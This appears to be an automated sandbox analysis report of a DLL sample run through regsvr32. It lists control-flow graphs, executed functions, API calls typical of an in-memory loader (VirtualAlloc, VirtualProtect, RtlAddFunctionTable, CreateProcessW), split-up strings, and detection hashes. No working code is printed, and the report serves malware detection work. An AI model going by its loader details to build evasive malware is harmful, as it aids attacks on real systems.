9725->9723 9725->9727 9728 640a00 9726->9728 9730 6409d9 VirtualProtect 9726->9730 9728->9727 9729 640a56 RtlAddFunctionTable 9728->9729 9729->9727 9730->9726 9731 7ff8ca9b1ee7 9732 7ff8ca9b1f13 RtlAllocateHeap 9731->9732 9733 7ff8ca9b1f5c 9732->9733 9734 7ff8ca9b1f3d RtlDeleteBoundaryDescriptor 9732->9734 9734->9733 10550 180021c3c 10551 180021c97 10550->10551 10554 180001bdc 10551->10554 10553 180021e38 10556 180001c82 10554->10556 10555 180001d21 CreateProcessW 10555->10553 10556->10555

                                                                    Executed Functions

                                                                    Function 00640000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 8 640000-640460 call 640aa8 * 2 VirtualAlloc 30 640462-640466 8->30 31 64048a-640494 8->31 32 640468-640488 30->32 34 640a91-640aa6 31->34 35 64049a-64049e 31->35 32->31 32->32 35->34 36 6404a4-6404a8 35->36 36->34 37 6404ae-6404b2 36->37 37->34 38 6404b8-6404bf 37->38 38->34 39 6404c5-6404d2 38->39 39->34 40 6404d8-6404e1 39->40 40->34 41 6404e7-6404f4 40->41 41->34 42 6404fa-640507 41->42 43 640531-640567 GetNativeSystemInfo 42->43 44 640509-640511 42->44 43->34 46 64056d-640589 VirtualAlloc 43->46 45 640513-640518 44->45 47 640521 45->47 48 64051a-64051f 45->48 49 6405a0-6405ac 46->49 50 64058b-64059e 46->50 51 640523-64052f 47->51 48->51 52 6405af-6405b2 49->52 50->49 51->43 51->45 54 6405b4-6405bf 52->54 55 6405c1-6405db 52->55 54->52 56 6405dd-6405e2 55->56 57 64061b-640622 55->57 58 6405e4-6405ea 56->58 59 640628-64062f 57->59 60 6406db-6406e2 57->60 61 6405ec-640609 58->61 62 64060b-640619 58->62 59->60 63 640635-640642 59->63 64 640864-64086b 60->64 65 6406e8-6406f9 60->65 61->61 61->62 62->57 62->58 63->60 68 640648-64064f 63->68 66 640917-640929 64->66 67 640871-64087f 64->67 69 640702-640705 65->69 70 640a07-640a1a 66->70 71 64092f-640937 66->71 72 64090e-640911 67->72 73 640654-640658 68->73 74 640707-64070a 69->74 75 6406fb-6406ff 69->75 98 640a40-640a4a 70->98 99 640a1c-640a27 70->99 77 64093b-64093f 71->77 72->66 76 640884-6408a9 72->76 78 6406c0-6406ca 73->78 79 64070c-64071d 74->79 80 640788-64078e 74->80 75->69 104 640907-64090c 76->104 105 6408ab-6408b1 76->105 84 640945-64095a 77->84 85 6409ec-6409fa 77->85 82 6406cc-6406d2 78->82 83 64065a-640669 78->83 81 640794-6407a2 79->81 86 64071f-640720 79->86 80->81 88 64085d-64085e 81->88 89 6407a8 81->89 82->73 90 6406d4-6406d5 82->90 94 64067a-64067e 83->94 95 64066b-640678 83->95 92 64095c-64095e 84->92 93 64097b-64097d 84->93 85->77 96 640a00-640a01 85->96 97 640722-640784 86->97 88->64 101 6407ae-6407d4 89->101 90->60 106 640960-64096c 92->106 107 64096e-640979 92->107 109 6409a2-6409a4 93->109 110 64097f-640981 93->110 111 640680-64068a 94->111 112 64068c-640690 94->112 108 6406bd-6406be 95->108 96->70 97->97 113 640786 97->113 102 640a4c-640a54 98->102 103 640a7b-640a8e 98->103 100 640a38-640a3e 99->100 100->98 114 640a29-640a35 100->114 135 640835-640839 101->135 136 6407d6-6407d9 101->136 102->103 115 640a56-640a79 RtlAddFunctionTable 102->115 103->34 104->72 124 6408b3-6408b9 105->124 125 6408bb-6408c8 105->125 116 6409be-6409bf 106->116 107->116 108->78 122 6409a6-6409aa 109->122 123 6409ac-6409bb 109->123 117 640983-640987 110->117 118 640989-64098b 110->118 119 6406b6-6406ba 111->119 120 6406a5-6406a9 112->120 121 640692-6406a3 112->121 113->81 114->100 115->103 130 6409c5-6409cb 116->130 117->116 118->109 128 64098d-64098f 118->128 119->108 120->108 129 6406ab-6406b3 120->129 121->119 122->116 123->116 131 6408ea-6408fe 124->131 132 6408d3-6408e5 125->132 133 6408ca-6408d1 125->133 137 640991-640997 128->137 138 640999-6409a0 128->138 129->119 139 6409cd-6409d3 130->139 140 6409d9-6409e9 VirtualProtect 130->140 131->104 146 640900-640905 131->146 132->131 133->132 133->133 144 640844-640850 135->144 145 64083b 135->145 142 6407e3-6407f0 136->142 143 6407db-6407e1 136->143 137->116 138->130 139->140 140->85 148 6407f2-6407f9 142->148 149 6407fb-64080d 142->149 147 640812-64082c 143->147 144->101 150 640856-640857 144->150 145->144 146->105 147->135 152 64082e-640833 147->152 148->148 148->149 149->147 150->88 152->136
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358032126.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_640000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: 2b89885f4bda90b06087f226635409d9579f169d94dbdea8471b0d4696e3ee9a
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: F472D530618B588FDB29DF18C8856F9B7E1FB98305F10562DE98BC7211DB34D986CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                    • API String ID: 0-464535774
                                                                    • Opcode ID: af6d23bac9e0564b4dade6cc976aa0f49490c733fc6aa684993268249fb5a7be
                                                                    • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                    • Opcode Fuzzy Hash: af6d23bac9e0564b4dade6cc976aa0f49490c733fc6aa684993268249fb5a7be
                                                                    • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180007958 Relevance: 9.3, Strings: 7, Instructions: 551COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 287 180007958-1800079e2 call 1800142a0 290 1800079e5-1800079eb 287->290 291 1800079f1 290->291 292 180007f68-180007f6e 290->292 295 180007eb7-180007f4d call 180021434 291->295 296 1800079f7-1800079fd 291->296 293 180008084-1800080f6 call 180021434 292->293 294 180007f74-180007f7a 292->294 309 1800080fb-180008101 293->309 297 180007fb4-180008075 call 18001e794 294->297 298 180007f7c-180007f82 294->298 310 180007f52-180007f58 295->310 299 180007d01-180007e4c call 180008738 296->299 300 180007a03-180007a09 296->300 317 18000807a-18000807f 297->317 303 180007f84-180007f8a 298->303 304 180007f9a-180007faf 298->304 299->317 326 180007e52-180007eaf call 18001d408 299->326 305 180007c76-180007cf7 call 180013e28 300->305 306 180007a0f-180007a15 300->306 312 18000811e-180008124 303->312 313 180007f90-180007f95 303->313 304->290 305->299 314 180007a1b-180007a21 306->314 315 180007b1d-180007c71 call 180018c60 call 180001b1c 306->315 318 180008103-180008108 309->318 319 18000810d 309->319 320 1800081dd-1800081fd 310->320 321 180007f5e 310->321 312->320 322 18000812a 312->322 313->290 324 180007a27-180007a2d 314->324 325 18000812f-1800081d8 call 180013e28 314->325 329 180008112-18000811b 315->329 328 180007b0c-180007b18 318->328 319->329 321->292 322->290 324->312 331 180007a33-180007af3 call 18002b4c4 324->331 325->320 326->295 328->290 329->312 338 180007af8-180007b06 331->338 338->328
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0n)G$9i&$IS_$c)K$oh$oh$J
                                                                    • API String ID: 0-4168131144
                                                                    • Opcode ID: a2fd07809090c8a4a54937da8c6413b95d54b2adce31cd57800155d5b9f01661
                                                                    • Instruction ID: 1745985c1503e7a5a98bbeacef01b65c9f03634c62e3202666f04ad1fcc3199d
                                                                    • Opcode Fuzzy Hash: a2fd07809090c8a4a54937da8c6413b95d54b2adce31cd57800155d5b9f01661
                                                                    • Instruction Fuzzy Hash: 69423870A0470CABCB58DF68C58AADEBBF1FB44304F40C169EC4AAB250D7759B19CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180010FF4 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 389 180010ff4-180011016 390 180011020 389->390 391 180011022-180011028 390->391 392 180011814 391->392 393 18001102e-180011034 391->393 394 180011819-18001181f 392->394 395 1800114e2-1800114ec 393->395 396 18001103a-180011040 393->396 394->391 399 180011825-180011832 394->399 397 1800114f5-18001151d 395->397 398 1800114ee-1800114f3 395->398 400 1800113e2-1800114d2 call 180008200 396->400 401 180011046-18001104c 396->401 403 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 397->403 398->403 400->399 410 1800114d8-1800114dd 400->410 401->394 402 180011052-18001120b call 180021040 call 1800291ac 401->402 415 180011212-1800113d7 call 1800291ac call 18001e2bc 402->415 416 18001120d 402->416 419 1800117f9-180011803 403->419 410->391 415->399 424 1800113dd 415->424 416->415 419->399 421 180011805-18001180f 419->421 421->391 424->390
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                    • API String ID: 0-3528011396
                                                                    • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                    • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 425 180021618-180021653 426 180021655-18002165a 425->426 427 180021bf3-180021c25 426->427 428 180021660-180021665 426->428 429 180021c2a-180021c2f 427->429 430 180021a81-180021bda call 180016314 428->430 431 18002166b-180021670 428->431 433 180021838-180021845 429->433 434 180021c35 429->434 440 180021bdf-180021bee 430->440 435 1800219f3-180021a7c call 180001b1c 431->435 436 180021676-18002167b 431->436 434->426 435->426 437 1800219e4-1800219ee 436->437 438 180021681-180021686 436->438 437->426 441 1800219d5-1800219df call 18001dfb4 438->441 442 18002168c-180021691 438->442 440->426 441->426 444 180021697-18002169c 442->444 445 18002190c-1800219a5 call 18000abac 442->445 447 1800216a2-1800216a7 444->447 448 180021846-180021907 call 180021434 444->448 453 1800219aa-1800219b0 445->453 447->429 451 1800216ad-180021835 call 180008200 call 1800166c0 447->451 448->426 451->433 454 1800219b2-1800219c6 453->454 455 1800219cb-1800219d0 453->455 454->426 455->426
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $&.+$)O$.pN$F>9$t(/
                                                                    • API String ID: 0-3036092626
                                                                    • Opcode ID: af092a803e8c5a8f60e198926b85640c086359e1e86988e2bc1304063bab4e4b
                                                                    • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                    • Opcode Fuzzy Hash: af092a803e8c5a8f60e198926b85640c086359e1e86988e2bc1304063bab4e4b
                                                                    • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180028C20 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 490 180028c20-180028c53 491 180028c58-180028c5e 490->491 492 180028c64-180028c6a 491->492 493 1800290ae-180029147 call 180013e28 491->493 494 1800290a4-1800290a9 492->494 495 180028c70-180028c76 492->495 503 18002914c-180029152 493->503 494->491 497 180029003-18002909f call 180008ea0 495->497 498 180028c7c-180028c82 495->498 497->491 501 180028c88-180028c8e 498->501 502 180028fab-180028ffe call 1800223c4 498->502 506 180028c94-180028c9a 501->506 507 180028df6-180028e1e 501->507 502->491 508 180029154 503->508 509 18002919c-1800291a8 503->509 512 180028d62-180028ddb call 180016bd8 506->512 513 180028ca0-180028ca6 506->513 507->491 511 180028e24-180028e3c 507->511 508->491 517 180028e42-180028ee6 call 18001d49c 511->517 518 180028ee9-180028f0b 511->518 521 180028de0-180028de6 512->521 514 180028cac-180028cb2 513->514 515 180029159-180029197 call 1800164c8 513->515 514->503 519 180028cb8-180028d5d call 180010c00 514->519 515->509 517->518 523 180028f94-180028f95 518->523 524 180028f11-180028f92 call 18001d49c 518->524 519->491 521->509 527 180028dec-180028df1 521->527 526 180028f98-180028f9b 523->526 524->526 526->491 532 180028fa1-180028fa6 526->532 527->491 532->491
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :G$Q27$_5$yy8x$Mh
                                                                    • API String ID: 0-3587547327
                                                                    • Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                    • Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
                                                                    • Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                    • Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 533 18000c608-18000c62d 534 18000c632-18000c637 533->534 535 18000cc8a-18000cc8f 534->535 536 18000c63d 534->536 537 18000cc95-18000cc9a 535->537 538 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 535->538 539 18000c643-18000c648 536->539 540 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 536->540 541 18000ce33-18000ced7 call 180008ad8 call 18001c32c 537->541 542 18000cca0-18000cca5 537->542 575 18000cfb4-18000d00a call 1800194a4 538->575 543 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 539->543 544 18000c64e-18000c653 539->544 567 18000cc28-18000cc85 call 1800194a4 540->567 579 18000cedc-18000cf26 call 1800194a4 541->579 548 18000cd35-18000cdce call 18000703c call 18001c32c 542->548 549 18000ccab-18000ccb0 542->549 543->534 551 18000c9c1-18000caa0 call 18002870c call 18001c32c call 1800194a4 544->551 552 18000c659-18000c65e 544->552 593 18000cdd3-18000ce2e call 1800194a4 548->593 556 18000ccb6-18000cd30 call 180021434 549->556 557 18000d00f-18000d014 549->557 551->534 559 18000c664-18000c669 552->559 560 18000c8bb-18000c963 call 180002610 call 18001c32c 552->560 556->534 557->534 565 18000d01a-18000d020 557->565 571 18000c7b2-18000c85a call 180019618 call 18001c32c 559->571 572 18000c66f-18000c674 559->572 600 18000c968-18000c9bc call 1800194a4 560->600 567->534 604 18000c85f-18000c8b6 call 1800194a4 571->604 572->557 582 18000c67a-18000c73d call 180002178 call 18001c32c 572->582 575->557 579->534 608 18000c742-18000c7ad call 1800194a4 582->608 593->534 600->534 604->534 608->534
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +#;)$K'$sf$w\H
                                                                    • API String ID: 0-1051058546
                                                                    • Opcode ID: 4270ae10590fc2f5bcc1345d173ce3869455f0ae6b4cef3f0208413052bdacb8
                                                                    • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                    • Opcode Fuzzy Hash: 4270ae10590fc2f5bcc1345d173ce3869455f0ae6b4cef3f0208413052bdacb8
                                                                    • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <4P$<8$<w.
                                                                    • API String ID: 0-1030867500
                                                                    • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                    • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180013E28 Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %'#$'1O"
                                                                    • API String ID: 0-3508158491
                                                                    • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                    • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                    • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                    • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001C964 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xDC
                                                                    • API String ID: 0-90241050
                                                                    • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                    • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                    • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                    • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180009100 Relevance: .1, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                    • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B3EEC Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                    • String ID:
                                                                    • API String ID: 994105223-0
                                                                    • Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                    • Instruction ID: 3b1fd2f4930ba6a6b24feec85842e94aced33f0689b31d0c510e93990c904754
                                                                    • Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                    • Instruction Fuzzy Hash: 3A419F31A09B6686EB34AF11B56E03A73A1FF88BC0F1444B4DA6E83B54CE3CE458C701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B2154 Relevance: 10.6, APIs: 7, Instructions: 87threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 187 7ff8ca9b2154-7ff8ca9b2160 188 7ff8ca9b2162-7ff8ca9b216b call 7ff8ca9b4110 187->188 189 7ff8ca9b21e1-7ff8ca9b21e3 187->189 197 7ff8ca9b216d-7ff8ca9b216f 188->197 201 7ff8ca9b2174-7ff8ca9b217b call 7ff8ca9b2fa0 188->201 191 7ff8ca9b21e5-7ff8ca9b21ed 189->191 192 7ff8ca9b221e-7ff8ca9b2221 189->192 196 7ff8ca9b21f3-7ff8ca9b2201 191->196 191->197 193 7ff8ca9b2223-7ff8ca9b2232 call 7ff8ca9b2c88 call 7ff8ca9b3108 192->193 194 7ff8ca9b2279-7ff8ca9b227c 192->194 213 7ff8ca9b2237-7ff8ca9b223d 193->213 198 7ff8ca9b2285 194->198 199 7ff8ca9b227e-7ff8ca9b2280 call 7ff8ca9b2f50 194->199 202 7ff8ca9b2203 call 7ff8ca9b36d0 196->202 203 7ff8ca9b2208-7ff8ca9b220b 196->203 204 7ff8ca9b228a-7ff8ca9b228f 197->204 198->204 199->198 214 7ff8ca9b2184-7ff8ca9b21a9 call 7ff8ca9b40a0 GetCommandLineA call 7ff8ca9b3eec call 7ff8ca9b3758 201->214 215 7ff8ca9b217d-7ff8ca9b2182 call 7ff8ca9b415c 201->215 202->203 203->198 209 7ff8ca9b220d-7ff8ca9b221c call 7ff8ca9b3a48 call 7ff8ca9b2c94 call 7ff8ca9b415c 203->209 209->198 213->197 218 7ff8ca9b2243-7ff8ca9b2257 FlsSetValue 213->218 236 7ff8ca9b21b2-7ff8ca9b21b9 call 7ff8ca9b3df4 214->236 237 7ff8ca9b21ab-7ff8ca9b21b0 call 7ff8ca9b2c94 214->237 215->197 223 7ff8ca9b2259-7ff8ca9b226d call 7ff8ca9b2cbc GetCurrentThreadId 218->223 224 7ff8ca9b226f-7ff8ca9b2274 call 7ff8ca9b3024 218->224 223->198 224->197 242 7ff8ca9b21da-7ff8ca9b21df call 7ff8ca9b3a48 236->242 243 7ff8ca9b21bb-7ff8ca9b21c2 call 7ff8ca9b3aec 236->243 237->215 242->237 243->242 248 7ff8ca9b21c4-7ff8ca9b21c6 call 7ff8ca9b347c 243->248 250 7ff8ca9b21cb-7ff8ca9b21cd 248->250 250->242 251 7ff8ca9b21cf-7ff8ca9b21d5 250->251 251->198
                                                                    APIs
                                                                      • Part of subcall function 00007FF8CA9B4110: HeapCreate.KERNELBASE(?,?,?,?,00007FF8CA9B2169), ref: 00007FF8CA9B4122
                                                                      • Part of subcall function 00007FF8CA9B4110: HeapSetInformation.KERNEL32 ref: 00007FF8CA9B414C
                                                                    • _RTC_Initialize.LIBCMT ref: 00007FF8CA9B2184
                                                                    • GetCommandLineA.KERNEL32 ref: 00007FF8CA9B2189
                                                                      • Part of subcall function 00007FF8CA9B3EEC: GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF8CA9B219B), ref: 00007FF8CA9B3F1B
                                                                      • Part of subcall function 00007FF8CA9B3EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF8CA9B219B), ref: 00007FF8CA9B3F5B
                                                                      • Part of subcall function 00007FF8CA9B3758: GetStartupInfoA.KERNEL32 ref: 00007FF8CA9B377D
                                                                    • __setargv.LIBCMT ref: 00007FF8CA9B21B2
                                                                    • _cinit.LIBCMT ref: 00007FF8CA9B21C6
                                                                      • Part of subcall function 00007FF8CA9B2C94: FlsFree.KERNEL32(?,?,?,?,00007FF8CA9B2217), ref: 00007FF8CA9B2CA3
                                                                      • Part of subcall function 00007FF8CA9B2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CA9B2217), ref: 00007FF8CA9B6A32
                                                                      • Part of subcall function 00007FF8CA9B2C94: free.LIBCMT ref: 00007FF8CA9B6A3B
                                                                      • Part of subcall function 00007FF8CA9B2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CA9B2217), ref: 00007FF8CA9B6A5B
                                                                      • Part of subcall function 00007FF8CA9B3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B314D
                                                                    • FlsSetValue.KERNEL32 ref: 00007FF8CA9B224C
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF8CA9B2260
